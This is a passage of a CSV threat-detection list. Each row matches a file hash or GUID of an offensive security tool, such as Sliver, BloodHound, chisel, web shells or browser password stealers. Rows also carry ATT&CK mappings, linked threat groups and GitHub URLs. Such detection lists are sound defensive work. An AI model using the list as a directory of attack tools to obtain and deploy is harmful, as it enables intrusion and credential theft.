fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","37400" "*c9f72eb2e307e3a7689a46f5e2e6c87bfe8f76c977b37e689b4ff3b1895b731e*",".{0,1000}c9f72eb2e307e3a7689a46f5e2e6c87bfe8f76c977b37e689b4ff3b1895b731e.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","37402" "*c9fb3bcd19b8d5dc86f3adf90f4953376910e796cddf0e2fdc1ee439be51b8de*",".{0,1000}c9fb3bcd19b8d5dc86f3adf90f4953376910e796cddf0e2fdc1ee439be51b8de.{0,1000}","offensive_tool_keyword","DLLHound","Find potential DLL Sideloads on your windows computer","T1574.001 - T1574.002","TA0004 - TA0007","N/A","N/A","Discovery","https://github.com/ajm4n/DLLHound","1","0","#filehash","N/A","7","3","201","22","2025-01-12T02:28:22Z","2024-12-20T02:26:16Z","37403" 
"*c9fb545f82ab77dbd39435af7b84aa618dc47e8463722d9532f16172545a659f*",".{0,1000}c9fb545f82ab77dbd39435af7b84aa618dc47e8463722d9532f16172545a659f.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","37404" "*c9fd001fed0cdce98f15a48956fc6ab60f3770a7e9d0e1368247dad940691048*",".{0,1000}c9fd001fed0cdce98f15a48956fc6ab60f3770a7e9d0e1368247dad940691048.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","37405" "*ca.mirrors.cicku.me/blackarch/*/os/*",".{0,1000}ca\.mirrors\.cicku\.me\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","37406" "*ca06ccf5e04e0ca3abd24fd5d8716a5fba124fd332abf89b8832e9e8b879ea0c*",".{0,1000}ca06ccf5e04e0ca3abd24fd5d8716a5fba124fd332abf89b8832e9e8b879ea0c.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - 
LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","37408" "*ca081dfda125f3b14589e205288777bdc209941e50cebb2298262adcd5c76c86*",".{0,1000}ca081dfda125f3b14589e205288777bdc209941e50cebb2298262adcd5c76c86.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","0","#filehash","https://www.rythmstick.net/posts/amsitrigger/","10","10","1195","166","2022-08-21T22:37:23Z","2020-05-27T09:17:19Z","37409" "*ca0b9b718173dbd056497bf66d6ef7bd81ca4a52bda882e64b4d418c88121d7e*",".{0,1000}ca0b9b718173dbd056497bf66d6ef7bd81ca4a52bda882e64b4d418c88121d7e.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","37411" "*ca12dd05b0f8cff9da1c8e088808a8c6e3218eefa22c0d92469abda3888dab4d*",".{0,1000}ca12dd05b0f8cff9da1c8e088808a8c6e3218eefa22c0d92469abda3888dab4d.{0,1000}","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","0","#filehash","N/A","10","10","933","196","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z","37412" 
"*ca13fecd8bd94170c12cb9de6c12b644bdea34c9d8c14de6a4065b30c6b1c20a*",".{0,1000}ca13fecd8bd94170c12cb9de6c12b644bdea34c9d8c14de6a4065b30c6b1c20a.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","37413" "*ca16e87c3ffc6496a23618ff180b0a57ec07e290207d47e8dc7489a208bf4d85*",".{0,1000}ca16e87c3ffc6496a23618ff180b0a57ec07e290207d47e8dc7489a208bf4d85.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","37414" "*ca2034f590d15577047e447e717299856b1a4518fd2fe6eef04429c344e0f206*",".{0,1000}ca2034f590d15577047e447e717299856b1a4518fd2fe6eef04429c344e0f206.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","37417" "*ca2133708cc46f76d99471f39e68047c931a2f7b9927d89f010c042ac97bab80*",".{0,1000}ca2133708cc46f76d99471f39e68047c931a2f7b9927d89f010c042ac97bab80.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","37418" "*ca245e03a26fd178305f09c391ee065899ab88dd3de6663b397a84d411f310fc*",".{0,1000}ca245e03a26fd178305f09c391ee065899ab88dd3de6663b397a84d411f310fc.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. 
Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","37419" "*ca26faa4eec38d70b7237a0d1da33577295731d34c9aefa08ecdb2e8000cb4af*",".{0,1000}ca26faa4eec38d70b7237a0d1da33577295731d34c9aefa08ecdb2e8000cb4af.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","#filehash","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","37420" "*CA280845-1F10-4E65-9DE7-D9C6513BBD91*",".{0,1000}CA280845\-1F10\-4E65\-9DE7\-D9C6513BBD91.{0,1000}","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","0","#GUIDproject","N/A","9","2","151","27","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z","37421" "*ca2aa2a0ef687163b261bba61c0b55033e9c4080bfb889e48b7e4664a2af91ed*",".{0,1000}ca2aa2a0ef687163b261bba61c0b55033e9c4080bfb889e48b7e4664a2af91ed.{0,1000}","offensive_tool_keyword","RPC-Backdoor","A basic emulation of an ""RPC Backdoor""","T1071.004","TA0011","N/A","N/A","C2","https://github.com/eladshamir/RPC-Backdoor","1","0","#filehash","N/A","10","10","240","45","2022-08-25T14:37:41Z","2022-08-16T13:12:05Z","37422" 
"*ca2c406c54af4a1dc16d98a018d8d1e565dae5e95e250ccce1904dedf351e865*",".{0,1000}ca2c406c54af4a1dc16d98a018d8d1e565dae5e95e250ccce1904dedf351e865.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","37423" "*ca2d675d9ac02a80e7b2893de9a509f905075e56e0820924ae57da696a1ebd68*",".{0,1000}ca2d675d9ac02a80e7b2893de9a509f905075e56e0820924ae57da696a1ebd68.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","37424" "*ca3227c4d833b341752927a08d6b41f0c3c81c03f41827859ecff6d008d45172*",".{0,1000}ca3227c4d833b341752927a08d6b41f0c3c81c03f41827859ecff6d008d45172.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","37426" "*ca32913db657697990e77b687cfdd25a3d40c45169802c874738581d3408549f*",".{0,1000}ca32913db657697990e77b687cfdd25a3d40c45169802c874738581d3408549f.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - 
Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","37427" "*ca3560757b7667c3b9ac2cca3b586493ef266b2b0591c1252d35f9e3a39cad08*",".{0,1000}ca3560757b7667c3b9ac2cca3b586493ef266b2b0591c1252d35f9e3a39cad08.{0,1000}","offensive_tool_keyword","php-reverse-shell","PHP shells that work on Linux OS - macOS and Windows OS","T1505.003 - T1059.003 - T1100","TA0003 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/ivan-sincek/php-reverse-shell","1","0","#filehash","N/A","10","10","482","152","2023-10-03T09:48:21Z","2020-07-14T07:22:54Z","37428" "*ca378ad09474b4c41b94590b65d3cdf28cd8e28063f1f9c5aa753f8f1b1ed233*",".{0,1000}ca378ad09474b4c41b94590b65d3cdf28cd8e28063f1f9c5aa753f8f1b1ed233.{0,1000}","offensive_tool_keyword","cryptomining","A Linux Cyptomining malware","T1496","TA0009","N/A","N/A","Cryptomining","https://github.com/tarcisio-marinho/cryptomining","1","0","#linux #filehash","N/A","7","1","36","15","2023-05-05T02:42:59Z","2018-04-07T03:59:52Z","37429" "*ca399318490eb76c9a598f4bfd193dc2281eced18c5ed432a41ef3eb540d673a*",".{0,1000}ca399318490eb76c9a598f4bfd193dc2281eced18c5ed432a41ef3eb540d673a.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","0","#filehash","N/A","10","10","159","29","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z","37430" "*ca39b6544676022075793b762288a2d13bd3db50d4ce983c624931639dbb75c6*",".{0,1000}ca39b6544676022075793b762288a2d13bd3db50d4ce983c624931639dbb75c6.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","37431" 
"*ca39c3b109987159e58bfa9feb0978f376837f177b1d3b19b49ce29e4d72d90a*",".{0,1000}ca39c3b109987159e58bfa9feb0978f376837f177b1d3b19b49ce29e4d72d90a.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","37432" "*ca3dcfb3f0b373014cc646ecc851c83f5f44ee341073b51b536b2ee0caa84bbb*",".{0,1000}ca3dcfb3f0b373014cc646ecc851c83f5f44ee341073b51b536b2ee0caa84bbb.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","37433" "*ca541408d19d557cbbb2c099082190a61814e1b39a0fed6567fb1f473cc780b3*",".{0,1000}ca541408d19d557cbbb2c099082190a61814e1b39a0fed6567fb1f473cc780b3.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","37435" "*ca56cf7dc2c29e1556f3fe3476ed76b18ab96372ca941bc92e22873c3472bd81*",".{0,1000}ca56cf7dc2c29e1556f3fe3476ed76b18ab96372ca941bc92e22873c3472bd81.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - 
T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","37436" "*ca5ba9e7a694713dc8d1edc1be2dc4cef3b390566cb4b22088a85817d1b3eeda*",".{0,1000}ca5ba9e7a694713dc8d1edc1be2dc4cef3b390566cb4b22088a85817d1b3eeda.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","37439" "*ca5eb2b6344df155fa10a39bf815f65daa9663250e657a3e1a8ffc4416efe778*",".{0,1000}ca5eb2b6344df155fa10a39bf815f65daa9663250e657a3e1a8ffc4416efe778.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","37440" "*ca60f4e33d70143b3f928143510d75e39c20d35c1cdf90ee77fbf76928eac3b9*",".{0,1000}ca60f4e33d70143b3f928143510d75e39c20d35c1cdf90ee77fbf76928eac3b9.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","37441" "*ca63dbb99d9da431bf23aca80dc787df67bb01104fb9358a7813ed2fce479362*",".{0,1000}ca63dbb99d9da431bf23aca80dc787df67bb01104fb9358a7813ed2fce479362.{0,1000}","offensive_tool_keyword","Smbtouch-Scanner","Smbtouch detect whether the target is vulnerable of one of these vulnerabilities: ETERNALBLUE - ETERNALCHAMPION - ETERNALROMANCE - ETERNALSYNERGY","T1210 - T1046 - T1133","TA0007 - TA0043 - TA0008","N/A","APT15 - Turla","Lateral Movement","https://github.com/3gstudent/Smbtouch-Scanner","1","0","#filehash","N/A","10","2","140","66","2021-04-17T01:42:06Z","2017-04-21T01:38:55Z","37443" "*ca698d8da51b0df3302f8e8593f3fceecf8c513d92a73bc3b585363a4d09bc61*",".{0,1000}ca698d8da51b0df3302f8e8593f3fceecf8c513d92a73bc3b585363a4d09bc61.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","37445" "*ca6a84b59ef6e40ee3657dd79a54706818d66345725434ade357898aa6722f62*",".{0,1000}ca6a84b59ef6e40ee3657dd79a54706818d66345725434ade357898aa6722f62.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","#filehash","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","37446" "*ca6d09368c87c863029065d8d134bea7edefe73e270b599336185bec60dc68ab*",".{0,1000}ca6d09368c87c863029065d8d134bea7edefe73e270b599336185bec60dc68ab.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - 
T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","37450" "*ca6e34d55019477a50ab0f91cdef48d755a7d8e10bfc65851a6bf67bc50f7963*",".{0,1000}ca6e34d55019477a50ab0f91cdef48d755a7d8e10bfc65851a6bf67bc50f7963.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","37451" "*ca72920176afc726b5966675af9b6f025d4a3418235c3864f7df2a5c0010a5ee*",".{0,1000}ca72920176afc726b5966675af9b6f025d4a3418235c3864f7df2a5c0010a5ee.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","37452" "*ca7851a4dd97eeea65e46725df9dcd9de9c1aaaec270830a131fd821b23809ff*",".{0,1000}ca7851a4dd97eeea65e46725df9dcd9de9c1aaaec270830a131fd821b23809ff.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","37453" 
"*ca8066d0eb20a83470e87bb583f11a864146ea958321dae51c93b2272a9b5922*",".{0,1000}ca8066d0eb20a83470e87bb583f11a864146ea958321dae51c93b2272a9b5922.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","37455" "*ca8e5157e4c093be717f36225fc1fb1fb4ffb1cf404cc9738c9a9fb7d41da29d*",".{0,1000}ca8e5157e4c093be717f36225fc1fb1fb4ffb1cf404cc9738c9a9fb7d41da29d.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","37457" "*ca94d5a554af633b96f7a6b0e4b8891b4a1e30812df356f7bc21e99dbce90d8e*",".{0,1000}ca94d5a554af633b96f7a6b0e4b8891b4a1e30812df356f7bc21e99dbce90d8e.{0,1000}","offensive_tool_keyword","ghostsocks","SOCKS5 proxy based on lightsocks","T1090.002 - T1090","TA0005 - TA0008","Lumma Stealer","N/A","Defense Evasion","https://github.com/LemonSaaS/ghostsocks","1","0","#filehash","N/A","7","1","2","1","2017-11-14T16:56:05Z","2017-11-13T03:38:57Z","37459" "*CA9F2786DFE0A75DAF0A5C711B355D6EE0B2605D7F344E85DA9F4D40127EBC69*",".{0,1000}CA9F2786DFE0A75DAF0A5C711B355D6EE0B2605D7F344E85DA9F4D40127EBC69.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation 
tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","#filehash","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","37462" "*ca9f976e3685e42d665ae930876aa30ed3246882a002eae35469520ab38a6b5c*",".{0,1000}ca9f976e3685e42d665ae930876aa30ed3246882a002eae35469520ab38a6b5c.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","37463" "*caa3c8d1a294def75b384c1bdfc7fab039da2d0e6c66beaae798adb0d9a22da4*",".{0,1000}caa3c8d1a294def75b384c1bdfc7fab039da2d0e6c66beaae798adb0d9a22da4.{0,1000}","offensive_tool_keyword","burp-log4shell","Log4Shell scanner for Burp Suite","T1190 - T1059.008 - T1071.001","TA0001 - TA0002 - TA0011","N/A","Dispossessor","Exploitation tool","https://github.com/silentsignal/burp-log4shell","1","0","#filehash","N/A","8","5","484","72","2023-09-24T08:29:56Z","2021-12-12T14:52:49Z","37464" "*caa3f53715c68033d72a623dfcc2412cc86bce077d6081685ead3b1498e8b804*",".{0,1000}caa3f53715c68033d72a623dfcc2412cc86bce077d6081685ead3b1498e8b804.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","#filehash","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","37465" "*caa6677a1abcce4018d5e5872d19f134ebdf27ad34c6b9a7356454342db37624*",".{0,1000}caa6677a1abcce4018d5e5872d19f134ebdf27ad34c6b9a7356454342db37624.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - 
TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","37466" "*CAA7AB97-F83B-432C-8F9C-C5F1530F59F7*",".{0,1000}CAA7AB97\-F83B\-432C\-8F9C\-C5F1530F59F7.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#GUIDproject","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","37467" "*caa9bf0d9c73fdc84aeed8abb19e9c81ad176abe83ae03d5b75daecd2c7925d5*",".{0,1000}caa9bf0d9c73fdc84aeed8abb19e9c81ad176abe83ae03d5b75daecd2c7925d5.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","37468" 